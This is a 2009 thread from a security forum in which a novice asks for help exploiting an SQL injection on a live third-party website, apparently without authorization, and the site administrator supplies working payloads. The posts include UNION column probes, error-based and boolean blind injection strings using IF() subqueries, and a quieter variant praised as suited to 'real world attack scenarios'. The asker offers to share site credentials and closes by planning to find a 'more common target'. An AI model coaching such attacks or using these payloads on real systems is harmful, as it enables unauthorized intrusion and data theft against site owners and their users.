Waraxe IT Security Portal
Login or Register
December 18, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 98
Members: 0
Total: 98
Full disclosure
[KIS-2024-07] GFI Kerio Control <= 9.4.5 Multiple HTTP Response Splitting Vulnerabilities
RansomLordNG - anti-ransomware exploit tool
APPLE-SA-12-11-2024-9 Safari 18.2
APPLE-SA-12-11-2024-8 visionOS 2.2
APPLE-SA-12-11-2024-7 tvOS 18.2
APPLE-SA-12-11-2024-6 watchOS 11.2
APPLE-SA-12-11-2024-5 macOS Ventura 13.7.2
APPLE-SA-12-11-2024-4 macOS Sonoma 14.7.2
APPLE-SA-12-11-2024-3 macOS Sequoia 15.2
APPLE-SA-12-11-2024-2 iPadOS 17.7.3
APPLE-SA-12-11-2024-1 iOS 18.2 and iPadOS 18.2
SEC Consult SA-20241211-0 :: Reflected Cross-Site Scripting in Numerix License Server Administration System Login
St. Poelten UAS | Multiple Vulnerabilities in ORing IAP
SEC Consult SA-20241204-0 :: Multiple Critical Vulnerabilities in Image Access Scan2Net (14 CVE)
Microsoft Warbird and PMP security research - technical doc
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Sql injection -> sql injection help please
Post new topicReply to topic View previous topic :: View next topic
sql injection help please
PostPosted: Thu Jun 04, 2009 3:25 pm Reply with quote
RubberDoll
Active user
Active user
Joined: Jun 04, 2009
Posts: 46




Hello waraxe,
and thank you and others as knowledgable, for offering your help in so many cases. I've been reading topics here as a guest for a long time Smile
sorry for picking stupid topic name, I'm a noob and I didn't know how to be more specific.

I'm pretty new to injections and I'm stuck with this error which I don't know how to move on.
I'm assuming the site is volunerable because it does reply with sql error, but no idea how to go from here..

id=20477+order+by+1--
no error, and the page displayed fine

id=20477+order+by+2--
Quote:

MySQL error occured on line 380.
Error 1054: Unknown column '2' in 'order clause'


I did discover tho, that when I tried
?id=20477+order+by+13--
the sql error changed
Quote:

MySQL error occured on line 94 in file c:\ZendProject/ZendProject_c/view-94.php.src.
Error 1054: Unknown column '13' in 'order clause'
Query: SELECT aw_d1_gal_cat.parent_line, aw_d1_gal_cat.date, aw_d1_gal_cat.name, aw_d1_gal_cat.descr, aw_d1_gal_cat.descr2, aw_d1_gal_cat.descr3, aw_d1_gal_cat.descr4, aw_d1_gal_cat.descr5, aw_d1_gal_cat.id, aw_d1_gal_cat.extid, aw_d1_gal_cat.parent, aw_d1_gal_cat.trial FROM aw_gal_content, aw_d1_gal_cat WHERE aw_gal_content.id=20477 order by 13-- and aw_d1_gal_cat.extid=aw_gal_content.cid


I also tried
id=null%20union%20all%20select%201,2,3,4,5,6,7,8,9,10,11,12--
Quote:
Error 1222: The used SELECT statements have a different number of columns


while ?id=null%20union%20all%20select%01,2,3,4,5,6,7,8,9,10,11,12,13--
results in the long syntax error as above

I assume 12 columns would be the correct guess, despite the error msg, but I don't know how to find the vulnerable column in this case, or is it even possible to go further with this

Thank you
View user's profile Send private message
PostPosted: Thu Jun 04, 2009 7:55 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Affected parameter (id) is used in multiple different sql queries and they need different column count. Try this:

Code:

id=-1+UNION+ALL+SELECT+12345--+


... and search for "12345" in response page html source.
If you can't get visual feedback, then next option is error-based feedback.
Try this:

Code:

?id=-1+OR+IF(0,(SELECT+1+UNION+ALL+SELECT+1),0)--+


Code:

?id=-1+OR+IF(1,(SELECT+1+UNION+ALL+SELECT+1),0)--+
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Fri Jun 05, 2009 3:53 am Reply with quote
RubberDoll
Active user
Active user
Joined: Jun 04, 2009
Posts: 46




Thank you, waraxe

id=-1+OR+IF(0,(SELECT+1+UNION+ALL+SELECT+1),0)--+
blank page with:
Quote:
item not found.



?id=-1+OR+IF(1,(SELECT+1+UNION+ALL+SELECT+1),0)--+
Quote:

MySQL error occured on line 94 in file c:\ZendProject/ZendProject_c/view-94.php.src.
Error 1242: Subquery returns more than 1 row
Query: SELECT aw_d1_gal_cat.parent_line, aw_d1_gal_cat.date, aw_d1_gal_cat.name, aw_d1_gal_cat.descr, aw_d1_gal_cat.descr2, aw_d1_gal_cat.descr3, aw_d1_gal_cat.descr4, aw_d1_gal_cat.descr5, aw_d1_gal_cat.id, aw_d1_gal_cat.extid, aw_d1_gal_cat.parent, aw_d1_gal_cat.trial FROM aw_gal_content, aw_d1_gal_cat WHERE aw_gal_content.id=-1 OR IF(1,(SELECT 1 UNION ALL SELECT 1),0)-- and aw_d1_gal_cat.extid=aw_gal_content.cid


btw, the site is an internet site and not on my machine, despite the local path shown in the error and is inside members area..
View user's profile Send private message
PostPosted: Fri Jun 05, 2009 8:41 am Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




This means that you can use blind sql injection methods. Still, are you sure, that you don't have usable visual feedback?

Try:

Code:

id=12000%2b345


Now Look at response page - do you see somewhere text as "12345"?
Another test:

Code:

id=-1+UNION+ALL+SELECT+0x4142434445--+


And look for text "ABCDE".
By the way, for best results look at html source and search for those text markers from there too!

Now, if you tried this and did not get easy-to-use visual feedback, then you have to use blind injection methods. It means asking target server boolean questions and getting data back bit-by-bit. Blind injection manual exploitation is time consuming and error prone, so I would recommend automated tools or scripts for this.
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Sat Jun 06, 2009 9:50 am Reply with quote
RubberDoll
Active user
Active user
Joined: Jun 04, 2009
Posts: 46




yep I'm completely sure I have no better visual feedback in the source
also there's no malformed page with these errors, only the error string displays by itself

id=12000%2b345

Code:
item not found.

that's the source..

id=-1+UNION+ALL+SELECT+0x4142434445--+
source of reply:
Code:

<b>MySQL</b> error occured on line <u>94</u> in file <u>c:\ZendProject/ZendProject_c/view-94.php.src</u>.<br><b>Error 1222:</b> <u>The used SELECT statements have a different number of columns</u><br><b>Query:</b> <u>SELECT aw_d1_gal_cat.parent_line, aw_d1_gal_cat.date, aw_d1_gal_cat.name, aw_d1_gal_cat.descr, aw_d1_gal_cat.descr2, aw_d1_gal_cat.descr3, aw_d1_gal_cat.descr4, aw_d1_gal_cat.descr5, aw_d1_gal_cat.id, aw_d1_gal_cat.extid, aw_d1_gal_cat.parent, aw_d1_gal_cat.trial FROM aw_gal_content, aw_d1_gal_cat WHERE aw_gal_content.id=-1 UNION ALL SELECT 0x4142434445-- and aw_d1_gal_cat.extid=aw_gal_content.cid</u>


Could I ask if there's any automated tool to perform the bit by bit injection?
and what exactly would I need to do to make it manually? I might give it a try little by little if nothing else is possible

I also wanted to ask, with your permision, what was I 'telling' to the server in these strings from your earlier reply:

?id=-1+OR+IF(0,(SELECT+1+UNION+ALL+SELECT+1),0)--+
?id=-1+OR+IF(1,(SELECT+1+UNION+ALL+SELECT+1),0)--+



lastly, I can PM you the login info and site url if you think that looking directly might help.. Embarassed

Thanks again Smile
View user's profile Send private message
PostPosted: Sat Jun 06, 2009 12:44 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Search Google for Blind Sql Injection tools:

http://www.google.ee/search?hl=et&q=blind+sql+injection+tool&btnG=Google+otsing&lr=&aq=f&oq=

Do you know c/c++/php/perl/python/ruby or other programming languages? If you do, then it's not hard to write your own exploit script/program.

Code:

?id=-1+OR+IF(0,(SELECT+1+UNION+ALL+SELECT+1),0)--+
?id=-1+OR+IF(1,(SELECT+1+UNION+ALL+SELECT+1),0)--+


Sql injection exploitation method above is based on indusing of sql errors.
Depending on boolean true or false, IF() construction will return two rows of ones or just zero. And in case of two rows you can see nice sql error message about subquery returning more than one row. In this way depending on server response attacker can differ between boolean true and false.
Example, which involves @@version:

Code:

?id=-1+OR+IF(LENGTH(@@version)<1,(SELECT+1+UNION+ALL+SELECT+1),0)--+
?id=-1+OR+IF(LENGTH(@@version)>0,(SELECT+1+UNION+ALL+SELECT+1),0)--+


Same example with different error inducing method:

Code:

?id=0%2bIF(LENGTH(@@version)<1,20477,0)
?id=0%2bIF(LENGTH(@@version)>0,20477,0)


Method above does not generate sql errors, which is generally good in the case of real world attack scenarios.
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Sun Jun 07, 2009 6:03 am Reply with quote
RubberDoll
Active user
Active user
Joined: Jun 04, 2009
Posts: 46




Thank you waraxe, I did find a windows tool (Absinthe) that also supports login (since the vulnerable script is in members area) but it does not support mysql

Unfortunately, I have no knowledge of programing. nothing at all.

Perhaps I'm aiming too high trying this site, and I should move on and find a more "common" target.
Thanks for your time :)
View user's profile Send private message
sql injection help please
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.047 Seconds